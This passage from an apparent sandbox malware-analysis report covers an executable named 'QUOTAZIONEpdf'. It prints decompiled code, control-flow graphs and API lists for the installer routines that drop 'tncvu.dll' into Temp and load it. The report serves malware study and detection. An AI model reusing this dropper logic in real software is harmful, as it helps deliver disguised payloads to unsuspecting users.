                • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 342 4017a5-4017b7 334->342 343 401795-4017a3 CompareFileTime 334->343 336 4017c5-4017e1 call 40575c 335->336 337 4017bf-4017c0 call 40573d 335->337 345 4017e3-4017e6 336->345 346 401859-401882 call 404e23 call 402f01 336->346 337->336 342->335 343->342 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 358 401884-401888 346->358 359 40188a-401896 SetFileTime 346->359 347->333 380 401830-401831 347->380 360 40184e-401854 348->360 358->359 362 40189c-4018a7 FindCloseChangeNotification 358->362 359->362 363 402886 360->363 365 40287d-402880 362->365 366 4018ad-4018b0 362->366 367 402888-40288c 363->367 365->363 370 4018b2-4018c3 call 405aa7 lstrcatA 366->370 371 4018c5-4018c8 call 405aa7 366->371 377 4018cd-402205 call 405346 370->377 371->377 377->367 384 40264e-402655 377->384 380->360 382 401833-401834 380->382 382->348 384->365
                C-Code - Quality: 75%
                			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\hardz\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\hardz\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                0x00401734
                0x0040173b
                0x00401744
                0x00401747
                0x0040174a
                0x0040174f
                0x00401757
                0x00401773
                0x00401759
                0x00401759
                0x0040175a
                0x0040175a
                0x00401779
                0x00401783
                0x00401783
                0x00401787
                0x0040178a
                0x0040178f
                0x00401791
                0x00401793
                0x00401798
                0x00401798
                0x004017a3
                0x004017a3
                0x004017b4
                0x004017b6
                0x004017b6
                0x004017b7
                0x004017b7
                0x004017ba
                0x004017bd
                0x004017c0
                0x004017c0
                0x004017c7
                0x004017d6
                0x004017db
                0x004017de
                0x004017e1
                0x00000000
                0x00000000
                0x004017e3
                0x004017e6
                0x00401840
                0x00401845
                0x004015a8
                0x0040264e
                0x0040264e
                0x0040287d
                0x00402880
                0x00402880
                0x00000000
                0x004017e8
                0x004017ee
                0x004017f9
                0x00401806
                0x00401811
                0x00401827
                0x00401827
                0x0040182a
                0x00000000
                0x00401830
                0x00401830
                0x00401831
                0x0040184e
                0x00402886
                0x00402886
                0x00402886
                0x00401833
                0x00401833
                0x00401834
                0x00401492
                0x00402200
                0x00402200
                0x00402200
                0x00401831
                0x0040182a
                0x00402888
                0x0040288c
                0x0040288c
                0x0040185e
                0x00401863
                0x00401871
                0x00401876
                0x0040187c
                0x00401880
                0x00401882
                0x0040188a
                0x00401896
                0x00401884
                0x00401884
                0x00401888
                0x00000000
                0x00000000
                0x00401888
                0x0040189f
                0x004018a5
                0x004018a7
                0x00000000
                0x004018ad
                0x004018ad
                0x004018b0
                0x004018c8
                0x004018b2
                0x004018b5
                0x004018be
                0x004018be
                0x004018cd
                0x004018d2
                0x004021fb
                0x00000000
                0x004021fb
                0x00000000

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,afqfmqnwor,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                • CompareFileTime.KERNEL32(-00000014,?,afqfmqnwor,afqfmqnwor,00000000,00000000,afqfmqnwor,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                  • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp$C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll$afqfmqnwor
                • API String ID: 1941528284-4261118648
                • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 395 403024 392->395 393->392 394 402f68-402f7b call 40302c 393->394 394->390 398 402f81-402f84 394->398 395->390 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 401 402ff9 399->401 402 402ffc-40300f ReadFile 399->402 403 40301d-403020 400->403 404 402f8f 400->404 401->402 402->392 405 403011-40301a 402->405 403->390 406 402f94-402f9c 404->406 405->403 407 402fa1-402fb3 ReadFile 406->407 408 402f9e 406->408 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->395 413->406 414 402feb 413->414 414->403
                C-Code - Quality: 93%
                			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                0x00402f06
                0x00402f10
                0x00402f19
                0x00402f1d
                0x00402f28
                0x00402f28
                0x00402f30
                0x00402f32
                0x00402f39
                0x00402f55
                0x00402f59
                0x00403022
                0x00403022
                0x00000000
                0x00402f68
                0x00402f6b
                0x00402f71
                0x00402f78
                0x00402f7b
                0x00402f84
                0x00402ff1
                0x00402ff7
                0x00402ff9
                0x00402ff9
                0x0040300b
                0x0040300f
                0x00000000
                0x00403011
                0x00403011
                0x00403014
                0x0040301a
                0x00000000
                0x0040301a
                0x00402f86
                0x00402f89
                0x0040301d
                0x0040301d
                0x00402f8f
                0x00402f94
                0x00402f94
                0x00402f9c
                0x00402f9e
                0x00402f9e
                0x00402faf
                0x00402fb3
                0x00000000
                0x00000000
                0x00402fc7
                0x00402fcf
                0x00402fed
                0x00403024
                0x00403024
                0x00402fd6
                0x00402fd6
                0x00402fd9
                0x00402fdc
                0x00402fdf
                0x00402fe9
                0x00000000
                0x00402feb
                0x00000000
                0x00402feb
                0x00402fe9
                0x00000000
                0x00402fcf
                0x00000000
                0x00402f94
                0x00402f89
                0x00402f84
                0x00402f7b
                0x00402f59
                0x00403025
                0x00403029

                APIs
                • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$Read$PointerWrite
                • String ID: 80A
                • API String ID: 2113905535-195308239
                • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040302C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 437 403191 431->437 438 403116-40311e 431->438 432->431 433 4030d7-4030f7 call 402bc5 432->433 433->431 442 403193-403194 437->442 440 403120-403136 WriteFile 438->440 441 403152-403158 438->441 443 403138-40313c 440->443 444 40318d-40318f 440->444 441->437 445 40315a-40315c 441->445 442->422 443->444 446 40313e-40314a 443->446 444->442 445->437 447 40315e-403171 445->447 446->430 448 403150 446->448 447->423 449 403177-403186 SetFilePointer 447->449 448->447 449->416
                C-Code - Quality: 94%
                			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x3d33f
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0x3d2e5
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x31e57
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x40e15a
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x3d33f
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}



















                0x00403030
                0x0040303d
                0x00403050
                0x00403055
                0x00403196
                0x00403198
                0x00000000
                0x0040319e
                0x00403061
                0x00403074
                0x0040307a
                0x00403080
                0x0040308b
                0x0040308b
                0x00403090
                0x00403095
                0x0040309d
                0x0040309f
                0x0040309f
                0x004030a8
                0x004030af
                0x00000000
                0x00000000
                0x004030b5
                0x004030bb
                0x004030c1
                0x00000000
                0x004030c7
                0x004030cd
                0x004030d7
                0x004030ed
                0x004030f2
                0x004030f7
                0x004030fd
                0x00403103
                0x0040310d
                0x00403114
                0x00000000
                0x00000000
                0x00403116
                0x0040311c
                0x0040311e
                0x00403152
                0x00403158
                0x00000000
                0x00000000
                0x0040315a
                0x0040315c
                0x00000000
                0x00000000
                0x0040315e
                0x0040315e
                0x00403171
                0x00000000
                0x00000000
                0x00403180
                0x00000000
                0x00403180
                0x0040312e
                0x00403136
                0x0040318d
                0x00403193
                0x00403193
                0x00000000
                0x0040313e
                0x0040313e
                0x00403144
                0x0040314a
                0x00000000
                0x00000000
                0x00000000
                0x00403150
                0x00403191
                0x00403191
                0x00000000
                0x00403191
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 00403041
                  • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                • WriteFile.KERNELBASE(0040B038,0040E15A,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                • SetFilePointer.KERNELBASE(0003D33F,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$Pointer$CountTickWrite
                • String ID: 80A$Z@
                • API String ID: 2146148272-2640753336
                • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 461 401f88-401f96 LoadLibraryExA 451->461 462 401f7b-401f86 GetModuleHandleA 451->462 453 402156-40215b call 401423 452->453 459 40287d-40288c 453->459 464 401f98-401fa6 GetProcAddress 461->464 465 402004-402006 461->465 462->461 462->464 467 401fe5-401fea call 404e23 464->467 468 401fa8-401fae 464->468 465->453 473 401fef-401ff2 467->473 469 401fb0-401fbc call 401423 468->469 470 401fc7-401fde call 72fb10a0 468->470 469->473 478 401fbe-401fc5 469->478 476 401fe0-401fe3 470->476 473->459 474 401ff8-401fff FreeLibrary 473->474 474->459 476->473 478->473
                C-Code - Quality: 57%
                			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                0x00401f51
                0x00401f51
                0x00401f56
                0x00401f5d
                0x0040200b
                0x00402156
                0x00402156
                0x0040287d
                0x00402880
                0x0040288c
                0x0040288c
                0x00401f6c
                0x00401f76
                0x00401f79
                0x00401f88
                0x00401f8c
                0x00401f92
                0x00401f96
                0x00402004
                0x00000000
                0x00402004
                0x00401f98
                0x00401fa2
                0x00401fa6
                0x00401fea
                0x00401fa8
                0x00401fab
                0x00401fae
                0x00401fde
                0x00401fb0
                0x00401fb3
                0x00401fbc
                0x00401fbe
                0x00401fbe
                0x00401fbc
                0x00401fae
                0x00401ff2
                0x00401ff9
                0x00401ff9
                0x00000000
                0x00401ff2
                0x00401f7c
                0x00401f82
                0x00401f86
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID: ?B
                • API String ID: 2987980305-117478770
                • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
